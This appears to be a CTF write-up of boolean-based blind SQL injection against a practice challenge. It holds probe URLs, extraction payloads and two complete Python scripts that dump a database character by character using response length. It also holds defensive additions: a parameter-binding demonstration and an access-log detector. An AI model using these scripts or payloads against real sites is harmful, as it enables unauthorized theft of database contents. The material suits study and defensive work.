Boolean-based blind injection: study notes
Source: Internet  Published: unity3d streamreader  Editor: 程序博客网  Time: 2024/05/17 05:01
CTF challenge the exploit targets: 简单的sql注入之3 ("Simple SQL Injection 3")
Steps:
First, test whether the injection point is boolean-based blind by comparing the responses to these requests:
http://localhost/index.php?id=2
http://localhost/index.php?id=2'
http://localhost/index.php?id=2''
http://localhost/index.php?id=2%23
http://localhost/index.php?id=2' and 1=1#
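Why these probes tell anything apart, and what removes the difference, as an added example that is not part of the original notes: an in-memory SQLite table (constructed data; the names items and title are hypothetical) stands in for the page's id lookup, and the same lookup is written once with string concatenation and once with a bound parameter. With concatenation a true and a false injected condition return different results, which is the one-bit oracle the rest of these notes rely on; with a bound parameter the whole input is compared as a single value, both probes return nothing, and a legitimate value containing a quote still works instead of breaking the query.

```python
import sqlite3


def make_db():
    """In-memory SQLite table standing in for the target's id lookup (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id TEXT PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO items VALUES (?, ?)",
        [("1", "first"), ("2", "second"), ("O'Brien", "quoted")],
    )
    conn.commit()
    return conn


def lookup_concat(conn, user_id):
    """The vulnerable shape: the request parameter is spliced into the SQL text,
    so a quote in the input ends the literal and the rest is parsed as SQL."""
    sql = "SELECT title FROM items WHERE id = '" + user_id + "'"
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return ("error", str(exc))
    return ("ok", [r[0] for r in rows])


def lookup_param(conn, user_id):
    """The hardened shape: the input is bound as a value and never parsed as SQL."""
    rows = conn.execute("SELECT title FROM items WHERE id = ?", (user_id,)).fetchall()
    return ("ok", [r[0] for r in rows])


def oracle_visible(lookup, conn):
    """True when a true and a false injected condition give different results,
    i.e. when an observer could read one bit per request from this lookup.
    SQLite uses '-- ' as its line comment, so it replaces the '#' in the notes."""
    true_case = lookup(conn, "2' AND 1=1 -- ")
    false_case = lookup(conn, "2' AND 1=2 -- ")
    return true_case != false_case


if __name__ == "__main__":
    db = make_db()
    print("concatenation leaks a bit:", oracle_visible(lookup_concat, db))
    print("parameter binding leaks a bit:", oracle_visible(lookup_param, db))
    print("O'Brien via concatenation:", lookup_concat(db, "O'Brien"))
    print("O'Brien via parameter:", lookup_param(db, "O'Brien"))
```

The parameterized form does not filter or reject the input; it simply gives the database no way to interpret it as syntax, which is why the true and false probes become indistinguishable.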
If it is boolean-based blind, proceed with the following steps:
1. Get the length of the database name
http://localhost/index.php?id=2' and length(database())>1%23
2. Get the database name
Payload: http://localhost/index.php?id=2' and ascii(substr(database(), {0}, 1))={1}%23
Python script to retrieve it automatically:
import requests


def getDBName(DBName_len):
    DBName = ""
    # Baseline request: a probe whose condition is true returns a page of the same length.
    success_url = "http://ctf5.shiyanbar.com/web/index_3.php?id=2"
    success_response_len = len(requests.get(success_url).text)
    url_template = "http://ctf5.shiyanbar.com/web/index_3.php?id=2' and ascii(substr(database(),{0},1))={1}%23"
    chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
    print("Start to retrieve database name...")
    print("Success_response_len is: ", success_response_len)
    for i in range(1, DBName_len + 1):
        print("Number of letter: ", i)
        tempDBName = DBName
        for char in chars:
            print("Test letter " + char)
            char_ascii = ord(char)  # only the ASCII code is sent, never the character itself
            url = url_template.format(i, char_ascii)
            response = requests.get(url)
            if len(response.text) == success_response_len:
                DBName += char
                print("DBName is: " + DBName + "...")
                break
        if tempDBName == DBName:
            # No candidate matched this position: the character set is too small.
            print("Letters too little! Program ended.")
            exit()
    print("Retrieve completed! DBName is: " + DBName)


getDBName(5)
3. Get the table name length
Payload: http://localhost/index.php?id=2' and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>0 %23
4. Get the table name
Much like getting the database name in step 2; the payload changes slightly:
http://localhost/index.php?id=2' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1), {0}, 1))={1}%23
5. Get the number and length of columns
姿势:http://localhost/index.php?id=2' and (select length(column_name) from information_schema.columns where table_name =0x666C6167 limit 0,1)>0%23
Here limit 0,1 selects the first column, limit 1,1 the second, and so on.
6. Get the column names
姿势:http://localhost/index.php?id=2' and ascii(substr((select column_name from information_schema.columns where table_name =0x666C6167 limit 0,1), {0}, 1))={1}%23
7. Dump the table
1. First determine how many rows the table has:
http://localhost/index.php?id=2' and (select count(*) from flag)>0%23
2. Then get the length of the current row's value:
http://localhost/index.php?id=2' and (select length(flag) from flag limit 0,1)>0%23
3. Get the value of the current row:
http://localhost/index.php?id=2' and ascii(substr((select flag from flag limit 0,1), {0}, 1))={1}%23
Script I wrote myself:
import binascii
import requests

MAX_DBName_len = 100
MAX_TableName_len = 100
MAX_ColumnName_len = 100
MAX_Data_len = 100
MAX_Table_Num = 100
MAX_Column_Num = 100
MAX_Data_Num = 100

# Baseline request: every probe is judged by whether its page has the same length as this one.
success_url = "http://ctf5.shiyanbar.com/web/index_3.php?id=2"
success_response_len = len(requests.get(success_url).text)
# Candidate characters. Only their ASCII codes go into the URL, so '#', '%' and '&' are safe here.
chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz{}_!@#$%^&*()'


def get_DBName_len():
    print("Start to get DBName_len...")
    DBName_len = 0
    url_template = success_url + "' and (length(database()))>{0}%23"
    for i in range(0, MAX_DBName_len):
        url = url_template.format(i)
        response = requests.get(url)
        if len(response.text) != success_response_len:
            # length > i is false for the first time exactly when i equals the length
            DBName_len = i
            print("DBName_len is: ", DBName_len)
            break
    if DBName_len == 0:
        if i == MAX_DBName_len - 1:
            print("DBName_len > MAX_DBName_len!")
        print("Cannot get DB_len. Program ended.")
        exit()
    return DBName_len


def get_DBName(DBName_len):
    print("Start to retrieve database name...")
    DBName = ""
    url_template = success_url + "' and ascii(substr(database(),{0},1))={1}%23"
    for i in range(1, DBName_len + 1):
        print("Number of letter: ", i)
        tempDBName = DBName
        for char in chars:
            print("Test letter " + char)
            char_ascii = ord(char)
            url = url_template.format(i, char_ascii)
            response = requests.get(url)
            if len(response.text) == success_response_len:
                DBName += char
                print("DBName is: " + DBName + "...")
                break
        if tempDBName == DBName:
            print("Letters too little! Program ended.")
            exit()
    print("Retrieve completed! DBName is: " + DBName)
    return DBName


def get_TableName_len(Table_num):
    print("Start to get TableName_len...")
    TableName_len = 0
    url_template = success_url + "' and (select length(table_name) from information_schema.tables where table_schema = database() limit {0},1)>{1}%23"
    for i in range(0, MAX_TableName_len):
        url = url_template.format(Table_num - 1, i)
        response = requests.get(url)
        if len(response.text) != success_response_len:
            TableName_len = i
            # print("TableName_len is: ", TableName_len)
            break
    if TableName_len == 0:
        # A length of 0 also means there is no table at this offset (the subquery returned NULL).
        if i == MAX_TableName_len - 1:
            print("TableName_len > MAX_TableName_len!")
        # print("Cannot get TableName_len. Program ended.")
    return TableName_len


def get_TableName(Table_num, TableName_len):
    print("Start to get TableName...")
    TableName = ""
    url_template = success_url + "' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit {0},1),{1},1))={2}%23"
    for i in range(1, TableName_len + 1):
        print("Number of letter: ", i)
        tempTableName = TableName
        for char in chars:
            print("Test letter " + char)
            char_ascii = ord(char)
            url = url_template.format(Table_num - 1, i, char_ascii)
            response = requests.get(url)
            if len(response.text) == success_response_len:
                TableName += char
                print("TableName is: " + TableName + "...")
                break
        if tempTableName == TableName:
            print("Letters too little! Program ended.")
            exit()
    print("Retrieve completed! TableName is: " + TableName)
    return TableName


def choose_Table():
    Tables = []
    for Table_num in range(1, MAX_Table_Num):
        TableName_len = get_TableName_len(Table_num)
        if TableName_len == 0:
            break
        TableName = get_TableName(Table_num, TableName_len)
        Tables.append(TableName)
    for i in range(len(Tables)):
        print(i + 1, ": " + Tables[i])  # numbered from 1 to match the prompt below
    value = input('Please input number to choose which table you want to dump:')
    Table_num_chosen = int(value)
    print("You have chosen table: " + Tables[Table_num_chosen - 1])
    return Tables[Table_num_chosen - 1]


def get_ColumnName_len(Column_num, TableName):
    print("Start to get ColumnName_len...")
    ColumnName_len = 0
    url_template = success_url + "' and (select length(column_name) from information_schema.columns where table_name = {0} limit {1},1)>{2}%23"
    for i in range(0, MAX_ColumnName_len):
        url = url_template.format(str2hex(TableName), Column_num - 1, i)
        response = requests.get(url)
        if len(response.text) != success_response_len:
            ColumnName_len = i
            print("ColumnName_len is: ", ColumnName_len)
            break
    if ColumnName_len == 0:
        if i == MAX_ColumnName_len - 1:
            print("ColumnName_len > MAX_ColumnName_len!")
    return ColumnName_len


def get_ColumnName(Column_num, ColumnName_len, TableName):
    print("Start to get ColumnName...")
    ColumnName = ""
    url_template = success_url + "' and ascii(substr((select column_name from information_schema.columns where table_name = {0} limit {1},1),{2},1))={3}%23"
    for i in range(1, ColumnName_len + 1):
        print("Number of letter: ", i)
        tempColumnName = ColumnName
        for char in chars:
            print("Test letter " + char)
            char_ascii = ord(char)
            url = url_template.format(str2hex(TableName), Column_num - 1, i, char_ascii)
            response = requests.get(url)
            if len(response.text) == success_response_len:
                ColumnName += char
                print("ColumnName is: " + ColumnName + "...")
                break
        if tempColumnName == ColumnName:
            print("Letters too little! Program ended.")
            exit()
    print("Retrieve completed! ColumnName is: " + ColumnName)
    return ColumnName


def get_Columns(TableName):
    Columns = []
    for Column_num in range(1, MAX_Column_Num):
        ColumnName_len = get_ColumnName_len(Column_num, TableName)
        if ColumnName_len == 0:
            break
        ColumnName = get_ColumnName(Column_num, ColumnName_len, TableName)
        Columns.append(ColumnName)
    for i in range(len(Columns)):
        print(i + 1, ": " + Columns[i])
    return Columns


def get_Data_len(TableName, ColumnName, Data_num):
    print("Start to get Data_len...")
    Data_len = 0
    url_template = success_url + "' and (select length({0}) from {1} limit {2},1)>{3}%23"
    for i in range(0, MAX_Data_len):
        url = url_template.format(ColumnName, TableName, Data_num - 1, i)
        response = requests.get(url)
        if len(response.text) != success_response_len:
            Data_len = i
            print("Data_len is: ", Data_len)
            break
    if Data_len == 0:
        if i == MAX_Data_len - 1:
            print("Data_len > MAX_Data_len!")
    return Data_len


def get_Data(TableName, ColumnName, Data_num, Data_len):
    print("Start to get Data...")
    Data = ""
    url_template = success_url + "' and ascii(substr((select {0} from {1} limit {2},1),{3},1))={4}%23"
    for i in range(1, Data_len + 1):
        print("Number of letter: ", i)
        tempData = Data
        for char in chars:
            print("Test letter " + char)
            char_ascii = ord(char)
            url = url_template.format(ColumnName, TableName, Data_num - 1, i, char_ascii)
            response = requests.get(url)
            if len(response.text) == success_response_len:
                Data += char
                print("Data is: " + Data + "...")
                break
        if tempData == Data:
            print("Letters too little! Program ended.")
            exit()
    print("Retrieve completed! Data is: " + Data)
    return Data


def get_Data_num(TableName):
    print("Start to get Data_num...")
    Data_num = 0
    url_template = success_url + "' and (select count(*) from {0})>{1}%23"
    for i in range(0, MAX_Data_Num):
        url = url_template.format(TableName, i)
        response = requests.get(url)
        if len(response.text) != success_response_len:
            Data_num = i
            print("Data_num is: ", Data_num)
            break
    if Data_num == 0:
        if i == MAX_Data_Num - 1:
            print("Data_num > MAX_Data_Num!")
        print("Cannot get Data_num.")
    return Data_num


def str2hex(s):
    # Encode the name as a 0x... hex literal so it needs no quotes inside the payload.
    return "0x" + binascii.b2a_hex(s.encode()).decode()


DBName_len = get_DBName_len()
DBName = get_DBName(DBName_len)
TableName = choose_Table()
Columns = get_Columns(TableName)
Data_num = get_Data_num(TableName)
Datas = ["" for _ in range(Data_num)]  # one output line per row
for i in range(len(Columns)):
    ColumnName = Columns[i]
    for j in range(Data_num):
        # rows are numbered from 1 in get_Data_len/get_Data (they subtract 1 for LIMIT)
        Data_len = get_Data_len(TableName, ColumnName, j + 1)
        Data = get_Data(TableName, ColumnName, j + 1, Data_len)
        Datas[j] += "\t" + Data
print("***************************")
print("Database: " + DBName)
print("Table: " + TableName)
print("***************************")
print("\t")
for i in range(len(Columns)):
    print(Columns[i], end="\t")
print()
for i in range(Data_num):
    print(Datas[i])
print("Program successfully ended!")
print("***************************")

# # the first table
# Table_num = 1
# TableName_len = get_TableName_len(Table_num)
# TableName = get_TableName(Table_num, TableName_len)
#
# # the first column
# Column_num = 1
# ColumnName_len = get_ColumnName_len(Column_num, TableName)
# ColumnName = get_ColumnName(Column_num, ColumnName_len, TableName)
#
# # the first record
# Data_num = 1
# Data_len = get_Data_len(TableName, ColumnName, Data_num)
# Data = get_Data(TableName, ColumnName, Data_num, Data_len)
#
# print("***************************")
# print("Database: " + DBName)
# print("Table: " + TableName)
# print("Column: " + ColumnName)
# print("Data: " + Data)
# print("Program successfully ended!")
# print("***************************")
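The two scripts above issue one request per candidate character per position, with only the compared ASCII value changing, and read each answer from the page length. As an added example that is not part of the original notes, the following detector (Python; the Apache combined-format log lines are constructed sample data, not real traffic) scans a web server access log for those payload shapes and reports, per client, how many requests matched, which signatures appeared, which positions of which expression were swept against which values, and the distinct response sizes, which is the two-valued pattern the length oracle leaves behind.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlparse

# Constructed Apache combined-format access-log lines (sample data, not real traffic).
# The request shapes mirror the payloads in the notes above: a baseline request, a
# length probe, a sweep of one character position against three ASCII values, a
# table-name probe, and two ordinary requests from a second client as a control.
SAMPLE_LOG = """\
10.0.0.5 - - [17/May/2024:05:01:01 +0000] "GET /index.php?id=2 HTTP/1.1" 200 1532 "-" "python-requests/2.31"
10.0.0.5 - - [17/May/2024:05:01:02 +0000] "GET /index.php?id=2%27%20and%20length(database())%3E1%23 HTTP/1.1" 200 1532 "-" "python-requests/2.31"
10.0.0.5 - - [17/May/2024:05:01:03 +0000] "GET /index.php?id=2%27%20and%20ascii(substr(database(),1,1))%3D48%23 HTTP/1.1" 200 1490 "-" "python-requests/2.31"
10.0.0.5 - - [17/May/2024:05:01:03 +0000] "GET /index.php?id=2%27%20and%20ascii(substr(database(),1,1))%3D49%23 HTTP/1.1" 200 1490 "-" "python-requests/2.31"
10.0.0.5 - - [17/May/2024:05:01:04 +0000] "GET /index.php?id=2%27%20and%20ascii(substr(database(),1,1))%3D50%23 HTTP/1.1" 200 1532 "-" "python-requests/2.31"
10.0.0.5 - - [17/May/2024:05:01:05 +0000] "GET /index.php?id=2%27%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))%3D102%23 HTTP/1.1" 200 1532 "-" "python-requests/2.31"
192.168.1.20 - - [17/May/2024:05:01:06 +0000] "GET /index.php?id=3 HTTP/1.1" 200 1601 "-" "Mozilla/5.0"
192.168.1.20 - - [17/May/2024:05:01:07 +0000] "GET /search.php?q=O%27Brien%20and%20sons HTTP/1.1" 200 1601 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Each signature is a fragment of the probing SQL used in the notes above, matched
# against the URL-decoded, lower-cased parameter value.
SIGNATURES = {
    "char_oracle": re.compile(r"\bascii\s*\(\s*substr(?:ing)?\s*\("),
    "length_oracle": re.compile(r"\blength\s*\("),
    "schema_enum": re.compile(r"\binformation_schema\."),
    "row_count": re.compile(r"\bcount\s*\(\s*\*\s*\)"),
    "comment_tail": re.compile(r"(#|--\s)\s*$"),
}

# Pulls (probed expression, position, compared ASCII value) out of a char-oracle
# probe, so the report can show one position being swept against several values.
PROBE_RE = re.compile(r"substr\((.+?),\s*(\d+),\s*1\)\)\s*=\s*(\d+)")


def decoded_params(target):
    """(name, decoded value) pairs from the query string of a request target."""
    qs = urlparse(target).query
    return [(k, v) for k, vs in parse_qs(qs, keep_blank_values=True).items() for v in vs]


def classify(value):
    """Sorted names of the blind-injection signatures present in one parameter value."""
    v = value.lower()
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(v))


def analyze(log_text):
    """Group flagged requests by client IP.

    Returns {ip: {"flagged": n, "signatures": [...], "sizes": [...],
                  "probes": {(expression, position): [values...]}}}.
    """
    report = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for _name, value in decoded_params(m["target"]):
            hits = classify(value)
            if not hits:
                continue
            entry = report.setdefault(m["ip"], {
                "flagged": 0, "signatures": set(), "sizes": set(), "probes": defaultdict(list),
            })
            entry["flagged"] += 1
            entry["signatures"].update(hits)
            if m["size"] != "-":
                entry["sizes"].add(int(m["size"]))
            pm = PROBE_RE.search(value.lower())
            if pm:
                entry["probes"][(pm.group(1), int(pm.group(2)))].append(int(pm.group(3)))
    for entry in report.values():  # plain, ordered containers for printing and testing
        entry["signatures"] = sorted(entry["signatures"])
        entry["sizes"] = sorted(entry["sizes"])
        entry["probes"] = dict(entry["probes"])
    return report


if __name__ == "__main__":
    for ip, entry in analyze(SAMPLE_LOG).items():
        print(ip, entry["flagged"], "flagged;", ", ".join(entry["signatures"]))
        for (expr, pos), values in entry["probes"].items():
            print("  position", pos, "of", expr, "swept against", values)
        print("  response sizes seen:", entry["sizes"])
```

The signatures alone would also fire on a single hand-typed probe; what makes the report useful is the grouping by client, where a run of requests sweeping one position against many values, combined with exactly two response sizes, is the fingerprint of the automated loop rather than of a curious user.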